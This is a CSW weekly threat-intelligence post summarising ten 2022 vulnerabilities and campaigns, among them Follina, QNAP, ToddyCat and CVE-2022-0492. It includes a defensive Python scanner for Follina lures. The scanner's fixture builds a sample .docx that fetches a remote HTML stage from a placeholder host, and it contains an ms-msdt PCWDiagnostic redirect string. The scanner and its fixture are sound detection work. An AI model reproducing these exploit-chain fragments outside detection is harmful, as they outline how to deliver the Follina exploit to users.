
CSW Weekly Threat Intelligence

Posted on Jul 1, 2022 | By Pavithra Shankar

CSW’s weekly threat intelligence edition brings to you early warnings about critical vulnerabilities that could potentially be weaponized and prove dangerous to your organization and its assets. 

All CVEs mentioned in this blog edition have received a maximum rating from the Threat Intelligence platform indicating high probability of exploitation. We urge organizations to prioritize these warnings and proactively patch these vulnerabilities.

Check out our Podcast on Top 3 Threats of the Week!

Top Critical Cyber Threats of the Week

  1. Russia’s APT28 Launches Follina Exploit Campaign in Ukraine 

  2. Critical PHP Flaw Opens QNAP NAS devices to RCE attacks

  3. CVE-2022-22620: Apple’s Safari Zombie Zero-Day Fixed!

  4. New ToddyCat APT Gang Hacks Microsoft Exchange Servers

  5. Adobe Illustrator Patches Multiple Zero-Day Vulnerabilities

  6. Avos Ransomware Group Develops New Attack Methods

  7. RIG Exploit Kit Infects Victim’s PCs With Dridex

  8. PoC Now Available for VMware Vulnerability (CVE-2022-22980)

  9. Siemens Fixes 15 Vulnerabilities in Its Industrial Network Management System

  10. Privilege Escalation Vulnerability in Linux Kernel

Russia’s APT28 Launches Follina Exploit Campaign in Ukraine  

APT28, the notorious Russian advanced persistent threat group also tracked as Fancy Bear and Sofacy, is the latest actor to exploit Follina, the vulnerability in the Microsoft Support Diagnostic Tool (MSDT) tracked as CVE-2022-30190. This week the group was observed sending phishing emails to Ukrainian users carrying a malicious document that exploits the now-patched flaw. The document, titled "Nuclear Terrorism A Very Real Threat.rtf", plays on fears that the conflict in Ukraine could spiral into a nuclear holocaust. RTF lures deserve particular attention with this bug: the exploit can fire from the Windows Explorer preview pane, without the file ever being opened in Word.

Threat Associated CVEs: CVE-2022-30190

CVSS Score: 7.8

Affected Product Count: 18

Exploit Type: RCE 

CWE: NVD-CWE-noinfo

Ransomware Associations: NA

APT Groups: TA413, APT28, TA570, and Sandworm

Malware: QBot and AsyncRAT

CISA KEV: Yes

CISA Patch Deadline: June 6, 2022

Patch: Download
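The delivery chain described above can be triaged offline with a small scanner. What follows is an added example written for this post, not code from the original article, from CSW, or from any of the groups named: it inspects a .docx package for the externally linked OLE relationship the public Follina chain uses to fetch its HTML stage, and it pulls ms-msdt: URIs out of that HTML stage. The sample document and HTML are constructed inline (the 203.0.113.10 host is a placeholder), and RTF lures like the one APT28 used need a separate RTF parser, which this example does not include.

```python
"""Triage helper for the Follina (CVE-2022-30190) delivery chain.

Added example for this post; not code from the original article or from any
group it names. The sample .docx and HTML below are constructed for the demo
and are not the APT28 lure described above.
"""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
# The public chain redirects to ms-msdt:/id PCWDiagnostic ...; any ms-msdt:
# URI in a document or its HTML stage is worth a look.
MSDT_URI = re.compile(r"ms-msdt:[^\"'<>\r\n]*", re.IGNORECASE)


def scan_ooxml(data: bytes) -> list:
    """Return a list of findings for an OOXML package (.docx) given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if name.endswith(".rels"):
                root = ET.fromstring(pkg.read(name))
                for rel in root.iter(REL_NS + "Relationship"):
                    target = rel.get("Target", "")
                    external = rel.get("TargetMode", "Internal") == "External"
                    # An OLE object fetched from an external URL is the Follina
                    # first stage; legitimate documents embed OLE objects locally.
                    if external and rel.get("Type") == OLE_REL_TYPE:
                        findings.append(f"{name}: external OLE object -> {target}")
                    if MSDT_URI.search(target):
                        findings.append(f"{name}: ms-msdt relationship -> {target}")
            elif name.endswith(".xml"):
                body = pkg.read(name).decode("utf-8", "ignore")
                if MSDT_URI.search(body):
                    findings.append(f"{name}: ms-msdt URI in part body")
    return findings


def find_msdt_invocations(html: str) -> list:
    """Extract ms-msdt: URIs from the HTML stage (typically window.location)."""
    return [m.group(0) for m in MSDT_URI.finditer(html)]


def build_sample_docx(malicious: bool) -> bytes:
    """Construct a minimal .docx in memory (demo input, not a real lure)."""
    if malicious:
        # Constructed: external OLE relationship to a placeholder host. The
        # trailing "!" mirrors the URL form seen in public Follina samples.
        rel = ('<Relationship Id="rId99" Type="%s" '
               'Target="http://203.0.113.10/index.html!" TargetMode="External"/>'
               % OLE_REL_TYPE)
    else:
        rel = ('<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
               'officeDocument/2006/relationships/styles" Target="styles.xml"/>')
    rels = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/'
            '2006/relationships">' + rel + '</Relationships>')
    document = ('<?xml version="1.0" encoding="UTF-8"?>'
                '<w:document xmlns:w="http://schemas.openxmlformats.org/'
                'wordprocessingml/2006/main"><w:body><w:p><w:r><w:t>sample'
                '</w:t></w:r></w:p></w:body></w:document>')
    content_types = ('<?xml version="1.0" encoding="UTF-8"?>'
                     '<Types xmlns="http://schemas.openxmlformats.org/package/'
                     '2006/content-types"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", content_types)
        pkg.writestr("word/document.xml", document)
        pkg.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed HTML stage; real stages pad the page with junk before the redirect.
SAMPLE_STAGE2_HTML = (
    "<html><body><script>\n"
    "window.location.href = \"ms-msdt:/id PCWDiagnostic /skip force "
    "/param \\\"IT_LaunchMethod=ContextMenu IT_BrowseForFile=payload-omitted\\\"\";\n"
    "</script></body></html>\n"
)

if __name__ == "__main__":
    # Usage: python follina_triage.py [file.docx ...]; with no arguments it
    # runs against the constructed samples.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                print(path, scan_ooxml(fh.read()))
    else:
        print("benign:", scan_ooxml(build_sample_docx(False)))
        print("malicious:", scan_ooxml(build_sample_docx(True)))
        print("stage 2:", find_msdt_invocations(SAMPLE_STAGE2_HTML))
```

On a real mailbox export, run scan_ooxml over every attachment and feed any HTML fetched from a flagged external target to find_msdt_invocations; an external OLE relationship alone is suspicious enough to quarantine, because ordinary documents embed OLE objects inside the package rather than linking them over HTTP.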

Critical PHP Flaw Opens QNAP NAS devices to RCE attacks

QNAP warned customers this week that some of its Network Attached Storage (NAS) devices may be vulnerable to attacks exploiting a three-year-old critical PHP vulnerability, CVE-2019-11043, a buffer underflow in PHP-FPM that is reachable through certain nginx configurations. Only devices running a non-default configuration (nginx with php-fpm running) are exposed. The vendor has already fixed the flaw in the affected operating systems: QTS 5.0.1.2034 build 20220515 or later, and QuTS hero h5.0.0.2069 build 20220614 or later. 

Threat Associated CVEs: CVE-2019-11043

CVSS Score: 9.8

Affected Product Count: 11

Exploit Type: RCE, PE, WebApp, DoS

CWE: CWE-787, CWE-120

Ransomware Associations: NextCry

APT Groups: NA

Malware: NA

CISA KEV: Yes

CISA Patch Deadline: April 15, 2022

Patch: Download

CVE-2022-22620: Apple’s Safari Zombie Zero-Day Fixed!

A Google Project Zero researcher described CVE-2022-22620 as a "zombie" Safari zero-day: a WebKit use-after-free that was originally fixed in 2013, reintroduced by a refactoring in December 2016, and then rediscovered and exploited in the wild before Apple patched it again in February 2022. It can be triggered by processing maliciously crafted web content. Given the in-the-wild exploitation, CISA added the CVE to its Known Exploited Vulnerabilities catalog.

Threat Associated CVEs: CVE-2022-22620

CVSS Score: 8.8

Affected Product Count: 4

Exploit Type: NA

CWE: CWE-416

Ransomware Associations: NA

APT Groups: NA

Malware: NA

CISA KEV: Yes

CISA Patch Deadline: February 25, 2022

Patch: Download

New ToddyCat APT Gang Hacks Microsoft Exchange Servers

The ToddyCat advanced persistent threat group has been targeting Microsoft Exchange servers across Asia and Europe for more than a year, since at least December 2020.

While tracking the group's activity, researchers found a previously unknown passive backdoor they named Samurai and a new trojan they named Ninja Trojan. Both give the attackers control of infected systems and let them move laterally within the network. 

The group exploited the Microsoft Exchange ProxyLogon vulnerabilities to execute code remotely on vulnerable servers and deploy China Chopper web shells. Since that initial access predates most ProxyLogon patching, Exchange servers that were exposed at the time should be checked for lingering web shells and the Samurai backdoor even if they are fully patched today.

Adobe Illustrator Patches Multiple Zero-Day Vulnerabilities

On June 14, 2022, Adobe released a security update for Illustrator that fixes five vulnerabilities: CVE-2022-30649, CVE-2022-30666, CVE-2022-30667, CVE-2022-30668, and CVE-2022-30669. The flaws have different root causes but all lie in two Illustrator plugins. Adobe Illustrator 2022 versions 26.0.2 and earlier, and Adobe Illustrator 2021 versions 25.4.5 and earlier, are affected.


Avos Ransomware Group Develops New Attack Methods

Researchers have discovered a new AvosLocker campaign that hunts for exposed networks. The attackers used a variety of tools, including Sliver, Cobalt Strike, and several commercially available network scanners. The investigated incident began with a pair of VMware Horizon Unified Access Gateways that were still vulnerable to Log4Shell (CVE-2021-44228). 


RIG Exploit Kit Infects Victim’s PCs With Dridex

A few months ago, the operators of the RIG Exploit Kit dropped Raccoon Stealer, the credential-stealing trojan the kit had been distributing, after Raccoon's operation went dark when one of its lead developers was reportedly killed in the Russian invasion of Ukraine. RIG's operators quickly replaced it with Dridex, the notorious financial trojan capable of keylogging and screenshot theft, which the tried-and-true exploit kit now delivers to victims' PCs. 

PoC Now Available for VMware Vulnerability (CVE-2022-22980)

Spring (VMware) published a security advisory for a high-severity SpEL expression injection vulnerability (CVE-2022-22980) in Spring Data MongoDB. It affects applications whose repository query methods are annotated with @Query or @Aggregate and whose query strings contain parameterized SpEL expressions (the ?#{...} placeholders). Exploitation requires unsanitized input to reach such a query, so the practical check is whether any repository method interpolates request-controlled values through SpEL; the fix is to upgrade Spring Data MongoDB and, until then, to validate or reject untrusted values before they reach those queries. 

Threat Associated CVEs: CVE-2022-22980

CVSS Score: NA

Exploit Type: NA

CWE: NA

Ransomware Associations: NA

APT Groups: NA

Malware: NA

Patch: Download

Siemens Fixes 15 Vulnerabilities in Its Industrial Network Management System

Siemens has disclosed 15 security flaws in SINEC NMS, its industrial network management system, some of which an attacker could exploit to achieve remote code execution on affected systems. Because an NMS holds credentials for, and has management access to, the devices it monitors, compromise of the NMS host puts the rest of the OT network within reach.

Privilege Escalation Vulnerability in Linux Kernel

On February 4, 2022, the Linux kernel maintainers disclosed CVE-2022-0492, a new privilege escalation vulnerability in control groups (cgroups), the kernel subsystem that, together with namespaces, underpins containers. The kernel did not check for CAP_SYS_ADMIN before allowing a write to the cgroup v1 release_agent file, exposing a privileged operation to unprivileged users by mistake. That makes this one of the simplest Linux privilege escalations of recent years and, on affected kernels, a container escape for containers that run without the default seccomp and AppArmor/SELinux restrictions.

Threat Associated CVEs: CVE-2022-0492

CVSS Score: 7.8

Affected Product Count: 43

Exploit Type: NA

CWE: CWE-287

Ransomware Associations: NA

APT Groups: NA

Malware: NA

CISA KEV: Yes

Patch: Download
